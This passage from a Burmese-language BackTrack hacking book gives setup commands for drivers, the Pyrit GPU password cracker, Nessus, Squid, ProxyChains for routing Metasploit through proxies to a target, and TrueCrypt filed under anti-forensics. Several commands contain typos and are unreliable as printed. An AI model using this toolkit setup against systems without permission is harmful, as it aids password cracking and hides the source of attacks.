Service မ်ားကိုေရြးခ်ယ္ေပးျခင္းျဖင့္လည္း Start/Stop ျပဳလုပ္ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 25
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Setting up the wireless network


Wireless Network တစ္ခုကို Settings အတြင္းသို႕၀င္ေရာက္၍ Configure ျပဳလုပ္ပံုကို ေအာက္တြင္
ေဖာ္ျပထားပါသည္။ ေဖာ္ျပထားေသာ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ လုပ္ေဆာင္ေပးျခင္းျဖင့္
Configure ျပဳလုပ္ႏိုင္မည္ျဖစ္ပါသည္။

၁။ Desktop မွ Applications Menu တြင္ Click ႏိွပ္ၿပီးေနာက္ Network Manager ကုိေရြးခ်ယ္ရပါမည္။


ထို႕ေနာက္ Internet >Wicd Network Manager ကိုေရြးခ်ယ္ရပါမည္။ သို႕မဟုတ္ပါက BackTrack ၏
Command Terminal တြင္ ေအာက္ပါ Command ကိုရိုက္ထည္႕ျခင္းျဖင့္လည္း ၀င္ေရာက္ႏိုင္ပါသည္။

wicd-gtk --no-tray

၂။ ထိုအခါ Wicd Network Manger ပြင့္လာမည္ျဖစ္ၿပီး အသံုးျပဳႏိုင္ေသာ Network မ်ားကို ေအာက္တြင္


ေဖာ္ျပထားသည္႕ပံုအတိုင္းျမင္ေတြ႕ရမည္ျဖစ္ပါသည္။

၃။ Network ႏွင့္သက္ဆိုင္ေသာ အခ်က္အလက္မ်ားကိုၾကည္႕ရွဳရန္အတြက္ Properties တြင္ Click


ႏိွပ္ျခင္းျဖင့္ ၾကည္႕ရွဳႏိုင္ပါသည္။ ထိ႕ု ေနာက္ ၾကည္႕ရွဳၿပီးေသာအခါတြင္ OK တြင္ Click ႏိွပ္ပါ။

26 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ေနာက္ဆံုးတြင္ Connect Button တြင္ Click ႏိွပ္ျခင္းျဖင့္ ေအာင္ျမင္စြာခ်ိိတ္ဆက္သြားႏိုင္ၿပီျဖစ္သည္။

ယခုအပိုင္းတြင္ Wireless Network ကို Setup ျပဳလုပ္ျခင္းႏွင့္ နိဂံုးခ်ဳပ္ထားပါသည္။ အဆိုပါ အဆင့္ကို


Network Manger စတင္ျခင္းႏွင့္ Router သို႕ခ်ိတ္ဆက္ျခင္းျဖင့္ စတင္ေစခဲ့ပါသည္။

မ်က္ပြင့္စာေပ 27
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

28 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 2

Customzing BackTrack
BackTrack ကုိေျပာင္းလဲျပင္ဆင္ျခင္း

မ်က္ပြင့္စာေပ 29
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
ယခုအခန္းတြင္ BackTrack ၏ Customize ျပဳလုပ္ျပင္ဆင္ျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္ၿပီး ထိုသို႕ ျပဳလုပ္
ျခင္းေၾကာင့္ ရရိွလာေစမည္႕ အက်ိဳးေက်းဇူးမ်ားကိုလည္း ရွင္းျပေပးမည္ျဖစ္ပါသည္။ ထို႕အျပင္ ATI ႏွင့္
NVIDIA GPU (Graphic Processing Unit) နည္းပညာမ်ားကိုအသံုးျပဳထားေသာ Graphic Card မ်ား ၏
Driver မ်ားကိုထည္႕သြင္းပံုတို႕ကိုလည္း ရွင္းျပထားပါသည္။ ထို႕အျပင္ ေနာက္ပိုင္းအခန္းမ်ားတြင္ အသံုးျပဳ
ရေသာ အျခားေသာ Tool မ်ားအသံုးျပဳပံုမ်ားကိုလည္း ရွင္းျပထားပါသည္။ ေနာက္ဆံုးအေနျဖင့္ Proxy-
Chains ႏွင့္ Digital အခ်က္အလက္မ်ားကို encrypt ျပဳလုပ္ျခင္းတို႕ကိုလည္း ေလ့လာရမည္ျဖစ္ပါသည္။
အခ်ဳပ္အားျဖင့္ဆိုရလွ်င္ ေအာက္ေဖာ္ျပပါအပိုင္းမ်ားကိုေလ့လာရမည္ျဖစ္ပါသည္။

- Preparing Kernel headers


- Installing Broadcom drivers
- Installing and configuring ATI Video Card Drivers
- Installing and configuring NVIDIA Video Card Drivers
- Applying Updates and Configuring extra securtiy tools
- Settings up ProxyChains
- Driectory encryption တို႕ျဖစ္ပါသည္။

Preparing Kenel Headers


Kernel Header မ်ားဆိုသည္မွာ Linux kernel တြင္အသံုး၀င္ေသာ Source Code မ်ားျဖစ္ပါသည္။
ထို႕ေၾကာင့္ယခုအပိုင္းတြင္ Kernel Hearder မ်ားကို Compilation ျပဳလုပ္ရန္ အေရးႀကီး ေသာအခ်က္မ်ား
ကို ေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ ထိုသ႕ို ျပဳလုပ္ရန္ Internet Connection တစ္ခုကို အသံုးျပဳ ရမည္ျဖစ္ပါ
သည္။ ျပဳလုပ္ရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာလုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္လုပ္ေဆာင္
ေပးရမည္ျဖစ္ပါသည္။

၁။ Terminal တြင္ ေအာက္တြင္ ေဖာ္ျပထားေသာ Command ကိုရိုက္ထည္႕ရပါမည္။

prepare-kernel-sources
30 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ေအာက္တြင္ ေဖာ္ျပထားေသာ Command မ်ားကိုထပ္မံရိုက္ထည္႕ၿပီး လုိအပ္ေသာအခ်က္အလက္


မ်ားကို ကူးယူရပါမည္။

cd /user /src /linux

cp –rf include/generated/* include/linux/

၃။ ထိုအခါ Kenel headers မ်ားအတြက္လိုအပ္ေသာ Code မ်ားကို Compile ျပဳလုပ္ရန္ အဆင္သင့္ျဖစ္


ေစမည္ျဖစ္ပါသည္။

Installing Broadcom Drivers


ယခုအပိုင္းအတြင္းတြင္ Official Broadcom Hybrid Linux wireless driver ကို ထည္႕သြင္းပံုတို႕ကို
ေလ့လာရမည္ျဖစ္ပါသည္။ Broadcom Wireless USB adapter တစ္ခုကိုအသံုးျပဳျခင္းျဖင့္ BackTrack 5
အတြင္းတြင္ Wireless USB Access Point တစ္ခုျဖင့္ ခ်ိတ္ဆက္သံုးစြႏ
ဲ ိုင္ေသာအက်ိဳးေက်းဇူးကို ရရိွႏိုင္ေစ
ပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Internet ျဖင့္ခ်ိတ္ဆက္ထားရန္ လုိအပ္ပါသည္။

၁။ Terminal ကိုဖြင့္ၿပီးေနာက္သင့္ေတာ္ေသာ Broadcom Driver ကို http://www.boardcom.com


/support/802.11/linux_sta.php မွတစ္ဆင့္ Download ျပဳလုပ္ႏိုင္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ
Command ကိုအသံုးျပဳရပါမည္။

cd /tmp/

wget http://www.boardcom.com/docs/linux_ata/hybri-portsrc_x86_64-v5_100_82_112.
tar.gz

မ်က္ပြင့္စာေပ 31
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ထို႕ေနာက္ ရရိွလာေသာ Driver ကို ေအာက္ေဖာ္ျပပါ Command မ်ားျဖင့္ Extract ျပဳလုပ္ရပါမည္။

mkdir boardcom

tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz –c /tmp/broadcom

၃။ ထို႕ေနာက္ wl_cfg802.11 ဖိုင္ကို ျပင္ဆင္ရပါမည္။ ထိုသို႕ျပင္ဆင္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ


Command ကိုအသံုးျပဳႏိုင္ပါသည္။

vim /tmp/broadcom/src/wl/sys/wl_cfg802.11.c

ထိုအတြင္းတြင္ ေအာက္ေဖာ္ျပပါ လိုင္းနံပါတ္ 1814 ကို ျပင္ဆင္ရန္လိုအပ္ပါသည္။ ထိ႕ု ေၾကာင့္

#if LINUX_VERSION_CODE> KERNEL_VERSION(2, 6, 39) ဆိုေသာစာေၾကာင္းကို ေအာက္တြင္


ေဖာ္ျပထားေသာ

#if LINUX_VERSION_CODE>= KERNEL_VERSION(2, 6, 39) ျဖင့္အစားထိုးရပါမည္။ ၿပီးဆံုးေသာ


အခါတြင္ အေျပာင္းအလဲမ်ားကို Save ျပဳလုပ္ပါ။

၄။ Code မ်ားကို Compile ျပဳလုပ္ရပါမည္။

make clean

make

make install
32 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ Depenencie မ်ားကို Update ျပဳလုပ္ရပါမည္။

depmod –a

၆။ ေအာက္ေဖာ္ျပပါ Command ကိုအသံုးျပဳ၍ Loaded modules မ်ားကိုရွာေဖြရပါမည္။

lsmod | grep b43\|ssb\|bcma

၇။ ေအာက္ပါ Command ျဖင့္ ရွာေဖြေတြ႕ရိွေသာ Module မ်ားကို ဖယ္ရွားရပါမည္။

rmmod <module>b43

<module> ဆိုသည္မွာ b43 သို႕မဟုတ္ ssb သို႕မဟုတ္ bcma တို႕ျဖစ္ႏိုင္ပါသည္။

၈။ Sytem Startup မွ Modules မ်ားကို loading လုပ္ျခင္းမွကာကြယ္ရန္အတြက္

echo “blacklist <module>” >> /etc/modprobe.d/blacklist.conf

<module> ေနရာတြင္ b43 သို႕မဟုတ္ ssb သိ႕ု မဟုတ္ bcma သို႕မဟုတ္ wl ျဖစ္ႏိုင္ပါသည္။

၉။ ေနာက္ဆံုးတြင္ Boot Process ၏ အစိတ္အပိုင္းတြင္ Linux Kenel သိ႕ု ျပဳလုပ္ျခင္းျဖင့္ New Module
ကို ေပါင္းထည္႕ေပးရပါမည္။

modprobe wl

မွတ္ခ်က္။ ။ အျခားေသာ နည္းလမ္းတစ္ခုမွာ b43 drivers မ်ားကို Kernel configuration တြင္


enable ျပဳလုပ္ျခင္းျဖစ္ၿပီး လုပ္ေဆာင္ခ်က္အျပည္႕အစံုကို http://www.backtrack-linux.org/wiki/
index.php?title=Enable_b43_drivers_in_Backtrack5_r2 တြင္ၾကည္႕ရွဳႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 33
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Installing and Configurting ATI Video Card


Drivers
ယခုအပိုင္းတြင္ ATI Video Card Driver ကို Install ျပဳလုပ္ျခင္းႏွင့္ Configure ျပဳလုပ္ပံုအေသးစိပ္ကို
AMD Accelerated Parallel Processing (APP) SDK, CAL++, ႏွင့္ OpenCL နည္းလမ္းအားျဖင့္ ေဖာ္ျပ
ထားပါသည္။ ATI Stream Technology ၏ အားသာခ်က္အရ Computationally-intensive tasks မ်ားကို
ေမာင္းႏွင္ႏိုင္ၿပီး CPU ေပၚတြင္ ေမာင္းႏွင္ႏိုင္သည္ဟုဆိုႏိုင္ပါသည္။ ထိုသို႕ေမာင္းႏွင္ျခင္းအရ ပိုမို လွ်င္ျမန္
ေစၿပီး ပိုမိုေခ်ာေမြ႕လြယ္ကူေစပါသည္။ ATI Stream Technology အရအခ်က္အလက္မ်ားကို ထပ္မံ
ေလ့လာလိုပါက www.amd.com/stream တြင္ေလ့လာႏိုင္ပါသည္။

ထုိသို႕ျပဳလုပ္ရန္လိုအပ္ခ်က္မ်ားမွာ

- Internet Connection တစ္ခုကို လိုအပ္ပါမည္။


- ထို႕ေနာက္ Kernel Header ျပင္ဆင္ခ်က္မ်ားကို ယခုလုပ္ေဆာင္ခ်က္မတိုင္မီ ျပဳလုပ္ထားရမည္
ျဖစ္ၿပီး Kernel Header ျပင္ဆင္ျခင္းကို Preparing Kernel Headers အပိုင္းတြင္ ေဖာ္ျပထားခဲ့ၿပီး
ျဖစ္ပါသည္။

ATI Drvier မ်ားကို Install ႏွင့္ Configure ျပဳလုပ္ရန္အတြက္ ေအာက္ပါလုပ္ေဆာင္ခ်က္မ်ားကို လုပ္


ေဆာင္ေပးရပါမည္။

၁။ Computer စနစ္အတြက္လိုအပ္ေသာ ATI Driver မ်ားကို Download ျပဳလုပ္ရပါမည္။

cd /tmp/

wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run

34 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

မွတ္ရန္။ ။ Display Driver မ်ားကို http://support.amd.com/us/gpudownload/Pages/index


.aspx မွလည္း Download ျပဳလုပ္ႏိုင္ပါသည္။

၂။ ေအာက္ပါ Command ကုိ အသံုးျပဳျခင္းျဖင့္ Install ျပဳလုပ္ျခင္းကို စတင္ေစႏိုင္ပါသည္။

sh amd-driver-installer-12-1-x86.x86_64.run

မ်က္ပြင့္စာေပ 35
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Setup ၿပီးဆံုးေသာအခါတြင္ အေျပာင္းအလဲမ်ားကို ေျပာင္းလဲရန္ႏွင့္ စနစ္မတည္ျငိမ္မႈမ်ားမွ ကာကြယ္


ႏိုင္ရန္အတြက္ System ကို Reboot ျပဳလုပ္ရပါမည္။

၄။ ထိုထက္ပိုမိုေသာ လုပ္ေဆာင္ခ်က္မ်ားအတြက္ Dependencies မ်ားကို Install ျပဳလုပ္ရန္လိုအပ္ပါ


သည္။

apt-get install libroot-python-dev libboost-python-dev libboost1.40-all-dev cmake

၅။ သင့္ကြန္ပ်ဴတာတြင္အသံုးျပဳထားေသာ CPU Architecture ကိုလိုက္၍ AMD APP SDK ကို Download


ျပဳလုပ္ၿပီး Untar ျပဳလုပ္ရပါမည္။

Wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-lnux64.tgz

mkdir AMD-APP-SDK-v2.6-lnx64

tar zxvf AMD-APP-SDK-v2.6-lnx64.tgz –c /tmp/AMD-APP-SDK-v2.6-lnx64

cd AMD-APP-SDK-v2.6 –lnx64

၆။ AMD APP SDK ကို ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ Install ျပဳလုပ္ရပါမည္။

sh Install-AMD-APP.sh

၇။ ATI Stream လမ္းေၾကာင္းမ်ားကို .bashrc ဖိုင္အျဖစ္ သတ္မွတ္ေပးရပါမည္။

echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >>~/.bashrc source~/.bashrc

၈။ CAL++ ကို Download ျပဳလုပ္ကာ Compile ျပဳလုပ္ရပါမည္။

cd /tmp/

svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp

cd calpp/trunk

cmake

36 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

make

make install

၉။ Pyrit ကို Download ျပဳလုပ္ၿပီး Compile ျပဳလုပ္ရပါမည္။

cd /tmp/

svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src

cd pyrit_src/pyrit

python setup.py build

python setup.py install

၁၀။ OpenCL ကို Build လုပ္ကာ Install ျပဳလုပ္ရပါမည္။

cd /tmp/pyrit_src/cpyrit_opencl

python setup.py build

python setup.py install

၁၁။ cpyrit_calpp setup ကို အေျပာင္းအလဲအနည္းငယ္ေျပာင္းလဲရပါမည္။

cd /tmp/pyrit_source/cpyrit_calpp

vi setup.py

ထို႕ေနာက္ ေအာက္ေဖာ္ျပပါ လိုင္းကို ေျပာင္းလဲေပးရပါမည္။

VERSION= ‘0.4.0-dev’ ကို

VERSION= ‘0.4.1-dev’ ဟုေျပာင္းလဲရပါမည္။

ထို႕အျပင္

CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, ‘include’)) ကို


မ်က္ပြင့္စာေပ 37
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

CALPP_INC-DIRS.append(os.path.join(CALPP_INC_DIR, ‘include/CAL’))

၁၂။ ေနာက္ဆံုးအေနျဖင့္ ATI GPU module ကို Pyrit သို႕ထည္႕သြင္းေပးရပါမည္။

Python setup.py build

Python setup.py install

မွတ္ရန္။ ။ အသင့္ျဖစ္ေသာ CAL++ Device မ်ားႏွင့္ CPU Core မ်ားကို သိရိွႏိုင္ရန္ ေအာက္ပါ
Command မ်ားကိုအသံုးျပဳႏိုင္ပါသည္။

pyrit list_cores

ထို႕အျပင္ Benchmark အျဖစ္သိရိွေဆာင္ရြက္ႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

pyrit benchmark

Installing and configuring NVIDIA video


card drivers
ယခုအပိုင္းတြင္ NVIDIA Video Card Driver မ်ားကို BackTrack OS အသံုးျပဳထားေသာ ကြန္ ပ်ဴတာ
မ်ားတြင္ထည္႕သြင္းအသံုးျပဳပံုကုိေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ ထိုသို႕အသံုးျပဳရန္အတြက္ CUDA toolkit ကို
အသံုးျပဳရပါမည္။ ထိုသို႕အသံုးျပဳျခင္းျဖင့္ GPU ၏စြမ္းရည္ကိုေထာက္ပံ့ေပးႏိုင္မည္ျဖစ္ၿပီး Graphic စြမ္းရည္
ျပည္႕စံုစြာျဖင့္အသံုးျပဳႏိုင္မည္ျဖစ္ပါသည္။

မွတ္ရန္။ ။ CUDA အေၾကာင္းကို ျပည္႕စံုစြာသိရိွႏိုင္ရန္အတြက္ http://www.nvidia.com/object/


cuda_home_new.html တြင္၀င္ေရာက္ၾကည္႕ရွဳႏိုင္ပါသည္။

Nvidia Graphic Driver ကိုထည္႕သြင္းအသံုးျပဳရန္အတြက္ လိုအပ္ခ်က္မ်ားမွာ

- Internet Connection တစ္ခုလိုအပ္ပါမည္။

38 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

- Kernel Headers ကို ျပင္ဆင္ထားရပါမည္။ Preparing Kernel Header အခန္းတြင္ ၄င္းျပင္ဆင္


ခ်က္မ်ားကိုေဖာ္ျပထားၿပီးျဖစ္ပါသည္။
- Nvidia Driver မ်ားကိုထည္႕သြင္းရန္အတြက္ X Session သည္ shutdown ျပဳလုပ္ရန္ လိုအပ္
ေကာင္း လိုအပ္မည္ျဖစ္ပါသည္။

အသံုးျပဳရန္လုပ္ေဆာင္ရမည္႕ လုပ္ေဆာင္ခ်က္မ်ားမွာ ေအာက္ပါအတိုင္းျဖစ္ပါသည္။

၁။ CPU architecture ကိုလိုက္၍ Nvidia Developer Display Driver ကို Download ျပဳလုပ္ရပါမည္။

cd /tmp/

wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/drivers/NVIDIA-
linux-x86_ 64-285.05.33.run

၂။ Driver ကို Install ျပဳလုပ္ရပါမည္။

chmod +x NVIDIA-Linux-x86_64-285.05.33.run ./NVIDIA-Linux-x86_64-285.05.33.run –


kernel-source-path=’/usr/src/linux’

၃။ CUDA toolkit ကုိ Download ျပဳလုပ္ရပါမည္။

wget
http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.2
8_linux_64_ubuntu11.04.run

၄။ CUDA toolkit ကို /opt သိ႕ု Install ျပဳလုပ္ရပါမည္။


မ်က္ပြင့္စာေပ 39
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

chmod +x cudatoolkit_4.1.28_linux_64_ubuntu11.04.run ./cudatoolkit_4.1.28_linux_64_


ubuntu11.04.run

၅။ nvcc ကိုအလုပ္လုပ္ႏိုင္ရန္အတြက္ လိုအပ္ေသာ Environment variable ကိုျပင္ဆင္ရပါမည္။

echo PATH=$PATH:/opt/cuda/bin>>~/.bashrc

echo LD_LIBARY_PATH=$LD_LIBARY_PATH:/opt/cuda/lib>> ~/.bashrc

echo export PATH >> ~./.bashrc

echo export LD_LIBARY_PATH >> ~/.bashrc

၆။ Variable မ်ားကို သက္ေရာင္မႈရိွေစရန္အတြက္ ေအာက္ပါ Command ကိုေမာင္းႏွင္ေပးရပါမည္။

source ~/.bashrc

ldconfig

၇။ Pyrit Dependencie မ်ားကို Install ျပဳလုပ္ရပါမည္။

apt-get install libssl-dev python-dev python-scapy

၈။ GPU powered tool, pyrit ကို Download ျပဳလုပ္ၿပီး Install ျပဳလုပ္ရပါမည္။

svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src

cd pyrit_src/pyrit

python setup.py build

python setup.py install

၉။ ေနာက္ဆံုးအေနျဖင့္ Pyrit ထဲသို႕ NVIDIA GPU Module ကိုေပါင္းထည္႕ေပးရပါမည္။

cd /tmp/pyrit_src/cpyrit_cuda

python setup.py build

40 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

python setup.py install

မွတ္ရန္။ ။ nvcc ကို verify လုပ္ျခင္းကို မွန္ကန္စြာ Install ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ


Command ကိုအသံုးျပဳႏိုင္ပါသည္။

nvcc –v

Benchmark အေနျဖင့္ ၾကည္႕ရွဳႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

pyrit benchmark

Applying Updates and Configuring extra


Security tools
ယခုအပိုင္းတြင္မူ BackTrack ကို Update ျပဳလုပ္ျခင္းလုပ္ငန္းစဥ္ႏွင့္ Extra Tool အခ်ိဳ႕ကို Configure
ျပဳလုပ္ျခင္းကိုေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ ထိုအျခင္းအရာမ်ားကိုျပဳလုပ္ရန္အတြက္ လိုအပ္ခ်က္မ်ားမွာ

၁။ Repositories ထဲတြင္ေနာက္ဆံုးေသာ အေျပာင္းအလဲမ်ားမွ Local Package index မ်ားကို update


ျပဳလုပ္ရန္အတြက္

apt-get update

၂။ ရိွၿပီးသား Package မ်ားကို Upgrade ျပဳလုပ္ရန္အတြက္

apt-get upgrade

၃။ Version အသစ္သို႕ Upgrade ျပဳလုပ္ရန္အတြက္ (ရရိွႏိုင္လွ်င္)

apt-get dist-upgrade

၄။ ေအာက္ေဖာ္ျပပါ Website တြင္ Registering ျပဳလုပ္၍ Nessus အတြက္ Activation code ကိုရရိွ
ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 41
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

http://www.nessus.org/prodjucts/nessus/nessus-plugins/obtain-an-activation-code

၅။ Nessus ကို Activate ျပဳလုပ္ရန္ ေဖာ္ျပပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

/opt/nessus/bin/nessus-fetch –register A60F-xxxx-xxxx-xxxx-0006

အထက္ပါ Command တြင္ A60F-xxxx-xxxx-xxxx-0006 သည္ Activation Code ျဖစ္ပါသည္။

၆။ Nessus Web Interface တြင္ User Account တစ္ခုတည္ေဆာက္ရန္အတြက္

/opt/nessus/sbin/nessus-adduser

၇။ Nesus Server ကို စတင္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

/etc/inti.d/nessusd start

၈။ Squid ကို Install ျပဳလုပ္ရန္အတြက္

apt-get install squid3

၉။ Squid ကို Start up လုပ္ငန္းစဥ္မွ ဖယ္ရွားရန္အတြက္

update-rc.d –f squid3 remove

မွတ္ရန္။ ။ Repository မွသင့္ေလွ်ာ္ေသာ Package တစ္ခုကိုရွာေဖြရန္အတြက္ ေအာက္ေဖာ္ျပပါ


Command ကို “apt-get update” Command ၿပီးေနာက္တြင္အသံုးျပဳႏိုင္ပါသည္။

apt-cache search <keyword>

အထက္ပါ Command တြင္ <keyword> သည္ Package Name သို႕မဟုတ္ အသံုးျပဳေလ့ရိွေသာ


Expression တစ္ခုခုျဖစ္ႏိုင္ပါသည္။

42 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Setting up ProxyChains
ProxyChains ဆိုသည္မွာ Proxy တစ္ခုကိုျဖတ္သန္း၍ Application တစ္ခုမွ မည္သည္႕ TCP
Connection ကိုမဆို ခြင့္ျပဳေပးႏိုင္ေသာ Program တစ္ခုပင္ျဖစ္ပါသည္။ ယခုအပိုင္းတြင္ Receiver ႏွင့္
Sender မွ တိုက္ရိုက္ခ်ိတ္ဆက္မႈကို ကန္႕သတ္ေပးႏိုင္ေသာ အသံုးျပဳသူမွ သတ္မွတ္ထားေသာ Proxies
စာရင္းမ်ားကိုျဖတ္သန္း၍ Connection တစ္ခုကိုသတ္မွတ္ေပးႏိုင္ေသာ အျခင္းအရာမ်ားကို ေဖာ္ျပေပး
မည္ ျဖစ္ပါသည္။ ProxyChains ကိုစတင္လုပ္ေဆာင္ရန္အတြက္

၁။ ProxyChains Configuration File ကို ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ ဖြင့္ရပါမည္။

vim /etc/proxychains.conf

၂။ အသံုးျပဳလိုေသာ Chaining တြင္ Comment ျပဳလုပ္ထားျခင္းကို ဖ်က္ပစ္ရပါမည္။ ဤေနရာတြင္


dynamic_chain ကိုအသံုးျပဳမည္ျဖစ္၍ dynamic_chain ေရွ႕တြင္ရိွေသာ Comment သေကၤတကို
ဖ်က္ပစ္ရပါမည္။ ေအာက္တြင္ေဖာ္ျပထားေသာပံုတြင္ၾကည္႕ပါ။

မ်က္ပြင့္စာေပ 43
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Proxy Server အခ်ိဳ႕ကို List ထဲတြင္ေပါင္းထည္႕ပါ။

၄။ ေျပာင္းလဲထားေသာ Proxies မ်ားကိုျဖတ္သန္းလ်က္ Target Host ကို Resolve ျပဳလုပ္ရပါမည္။


ေအာက္ပါ Command ကိုၾကည္႕ပါ။

proxyresolv www.targethost.com

၅။ ထို႕ေနာက္ အသံုးျပဳလိုေသာ Application ကိုျဖတ္သန္းလ်က္ ProxyChains ကိုေမာင္းႏွင္ႏိုင္ပါသည္။


ဥပမာအားျဖင့္

proxychains msfconsole

44 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Directory Encryption
ယခုအခန္း၏ေနာက္ဆံုးအပိုင္းအရ Information Privacy အေၾကာင္းကိုေဖာ္ျပေပးမည္ျဖစ္ပါ
သည္။ ထိုအပိုင္းတြင္ TrueCrypt ကိုအသံုးျပဳ၍ အေရးႀကီးေသာအခ်က္အလက္မ်ားႏွင့္ လွ်ိဳ႕၀ွက္ Digital
Information မ်ားကို Encryption Key ျဖင့္ ေဖ်ာက္ထား၍ ရပံုကိုလုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္ပါသည္။

၁။ Application Menu မွ BackTrack >Forensics>Digital Anti Forensics>Install truecrypt သိ႕ု


အဆင့္ဆင့္သြားေရာက္ျခင္းျဖင့္ TrueCrypt ကို Install ျပဳလုပ္ပါ။ ထို႕ေနာက္ Install TrueCrypt တြင္ Click
ႏိွပ္ၿပီး Computer Screen ေပၚတြင္ေပၚလာေသာ လမ္းညြန္ခ်က္မ်ားအတိုင္း လုပ္ေဆာင္ရပါမည္။

၂။ ထို႕ေနာက္ Application>BackTrack>Forensics>Digital Anti Forensics>truecrypt သို႕အဆင့္


ဆင့္သြားေရာက္ကာ TrueCrypt Software ကိုဖြင့္လွစ္ရပါမည္။

မ်က္ပြင့္စာေပ 45
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ TrueCrypt Volume Creation Wizard ကိုစတင္ႏိုင္ရန္အတြက္ Create Volume တြင္ Click ႏိွပ္ပါ။

